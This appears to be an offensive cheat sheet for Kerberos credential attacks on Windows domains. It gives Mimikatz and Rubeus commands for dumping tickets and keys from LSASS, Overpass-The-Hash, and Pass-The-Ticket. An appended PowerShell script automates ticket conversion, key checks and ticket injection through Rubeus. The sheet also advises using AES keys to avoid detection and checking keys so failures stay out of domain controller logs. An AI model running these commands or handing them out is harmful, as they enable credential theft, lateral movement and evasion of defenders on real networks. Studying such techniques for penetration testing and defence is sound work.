Ticket/Hash Attacks

Exporting Tickets

Mimikatz

sekurlsa::tickets /export
or, if that does not work, try

sekurlsa::ekeys

ekeys does not list tickets but the Kerberos keys of each logon session (the RC4 key, which is the NT hash, plus the AES128 and AES256 keys); those keys are what the Overpass-The-Hash commands below consume. Both commands read LSASS, so run them from an elevated session after privilege::debug.

Exported file names whose client name ends in a $ symbol (for example DC01$) belong to the computer account, which holds its own tickets for talking to domain services. The bracketed value at the front is not random: it is the logon session ID (LUID) the ticket was found in (0;3e7 is the SYSTEM session), followed by two counters and the ticket flags in hex. Then comes the client name, an @ symbol, the service name, a hyphen and the realm. For example: [luid]-counters-flags-username@service-domain.local.kirbi. A TGT shows krbtgt as the service; any other service name means a service ticket (TGS) for that service.

Rubeus

Rubeus.exe dump /nowrap

Without elevation this only lists the tickets of your own logon session; run it elevated to dump every session. /nowrap prints each ticket as a single unbroken base64 line that can be pasted straight into the ptt /ticket: command further down.

Overpass-The-Hash

Where Pass-The-Hash uses the NT hash directly for NTLM authentication, Overpass-The-Hash uses the hash (the RC4 key) or an AES key to request a Kerberos TGT from the KDC, so the resulting access is pure Kerberos.

Mimikatz

sekurlsa::pth /domain:amogus.kek /user:carni7 /ntlm:1293uo1uwfoi1hw081

This starts a new process (cmd.exe by default; change it with /run:) whose logon session carries the supplied hash; the first time that process touches a Kerberos service, Windows requests a TGT with it. Like the export commands, it needs an elevated session.

Rubeus

Here the asktgt action requests a TGT from the KDC using the supplied key. /rc4 takes the NT hash (32 hex characters); /aes256 takes the AES256 key (64 hex characters). Prefer the AES key when you have it: an RC4-encrypted AS-REQ from an account whose normal traffic is AES is a common detection.

Rubeus.exe asktgt /domain:amogus.kek /user:carni7 /aes256:1293uo1uwfoi1hw081 /nowrap

Pass-The-Ticket

Pass-The-Ticket, in contrast to Pass-The-Hash and Overpass-The-Hash, needs no key at all: an existing ticket is injected into the current logon session. With a TGT you can then request service tickets (TGS) and reach services; with a service ticket you can reach only that service.

Mimikatz

kerberos::ptt "C:\Users\carni7\Desktop\Mimikatz\[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi"

Rubeus PTT Using Hash

Rubeus.exe asktgt /domain:amogus.kek /user:carni7 /rc4:1293uo1uwfoi1hw081 /ptt

Unlike the Overpass-The-Hash command above, /ptt makes asktgt inject the TGT it receives into the current logon session straight away, so Overpass-The-Hash and Pass-The-Ticket happen in one step. This form only applies when you supply a key (/rc4, /aes128 or /aes256); if you already hold a ticket, use the ptt action instead.

Rubeus PTT Using Ticket

Rubeus.exe ptt /ticket:[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi

Rubeus PTT Using Encoded Ticket

[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi"))
Rubeus.exe ptt /ticket:LETSIMAGINETHISISOURBASE64ENCODEDKERBEROSTICKET
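The Rubeus asktgt/ptt commands and the base64 conversion above move the same DER-encoded KRB-CRED between two shapes: Rubeus prints it as base64, Mimikatz wants it as a .kirbi file. The added PowerShell example below (my code, not from the original page, Rubeus or Mimikatz) converts in both directions, checks that a blob really is a KRB-CRED before you try to inject it, validates key lengths for asktgt, and builds the argument list for whichever Rubeus action fits the input you have. It assumes Rubeus.exe sits in the current directory and uses a constructed 8-byte DER prefix as its sample ticket:

```powershell
# Added example, not from the original page or from the tools it describes.

function Test-KrbCred {
    # KRB-CRED ::= [APPLICATION 22] SEQUENCE, so the first DER byte of every
    # .kirbi is 0x76 (class APPLICATION, constructed, tag number 22).
    param([Parameter(Mandatory)][byte[]]$Bytes)
    return ($Bytes.Length -gt 4 -and $Bytes[0] -eq 0x76)
}

function ConvertTo-KirbiBase64 {
    # .kirbi file -> one-line base64, the form `Rubeus.exe ptt /ticket:` accepts.
    param([Parameter(Mandatory)][string]$Path)
    $bytes = [IO.File]::ReadAllBytes((Resolve-Path $Path).ProviderPath)
    if (-not (Test-KrbCred $bytes)) { throw "$Path does not start with a KRB-CRED tag; not a .kirbi" }
    return [Convert]::ToBase64String($bytes)
}

function ConvertFrom-KirbiBase64 {
    # base64 (as printed by `asktgt /nowrap` or `dump /nowrap`) -> .kirbi file
    # for `kerberos::ptt`. Whitespace is stripped in case the blob was wrapped.
    param([Parameter(Mandatory)][string]$Base64, [Parameter(Mandatory)][string]$OutFile)
    $bytes = [Convert]::FromBase64String(($Base64 -replace '\s', ''))
    if (-not (Test-KrbCred $bytes)) { throw "blob is not a KRB-CRED; copy the whole base64 string" }
    [IO.File]::WriteAllBytes($OutFile, $bytes)
    return $OutFile
}

function Test-KerberosKey {
    # /rc4 (NT hash) and /aes128 keys are 16 bytes = 32 hex chars; /aes256 is 32 bytes = 64 hex chars.
    param([Parameter(Mandatory)][string]$Key,
          [ValidateSet('rc4', 'aes128', 'aes256')][string]$Type = 'rc4')
    $len = if ($Type -eq 'aes256') { 64 } else { 32 }
    return ($Key -match "^[0-9a-fA-F]{$len}$")
}

function New-RubeusPttArgs {
    # Ticket in hand -> `ptt /ticket:`; key in hand -> `asktgt ... /ptt` (Overpass-The-Hash + PTT in one step).
    param([string]$Domain, [string]$User, [string]$Key, [string]$KeyType = 'rc4', [string]$Ticket)
    if ($Ticket) { return @('ptt', "/ticket:$Ticket") }
    if (-not (Test-KerberosKey -Key $Key -Type $KeyType)) {
        throw "$KeyType key must be $(if ($KeyType -eq 'aes256') { 64 } else { 32 }) hex characters"
    }
    return @('asktgt', "/domain:$Domain", "/user:$User", "/${KeyType}:${Key}", '/ptt')
}

# Constructed sample: the first 8 DER bytes of a KRB-CRED stand in for a ticket.
$fakeKirbi = [byte[]](0x76, 0x82, 0x04, 0x1a, 0x30, 0x82, 0x04, 0x16)
$blob = [Convert]::ToBase64String($fakeKirbi)
Test-KrbCred ([Convert]::FromBase64String($blob))      # True
Test-KrbCred ([byte[]](0x30, 0x82, 0x04, 0x16))        # False: plain SEQUENCE, not a KRB-CRED
Test-KerberosKey -Key '1293uo1uwfoi1hw081' -Type rc4   # False: the page's placeholder is not 32 hex chars
Test-KerberosKey -Key ('a' * 64) -Type aes256          # True

# Real use: convert a mimikatz export for Rubeus, or a Rubeus blob for mimikatz.
# $blob = ConvertTo-KirbiBase64 -Path '.\[0;7f830]-5-2-43f10000-carni7@krbtgt-amogus.kek.kirbi'
# ConvertFrom-KirbiBase64 -Base64 $blob -OutFile '.\carni7.kirbi'
$rubeusArgs = New-RubeusPttArgs -Ticket $blob
if (Test-Path '.\Rubeus.exe') { & '.\Rubeus.exe' @rubeusArgs }
```

The 0x76 check is deliberately cheap: it catches the two mistakes that actually happen in practice, pasting a truncated base64 string and pointing ptt at a file that is not a ticket, without pulling in an ASN.1 parser. The key-length check catches the other common one, feeding an AES256 key to /rc4 or vice versa, before the KDC answers with a pre-authentication failure that lands in the domain controller's logs.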
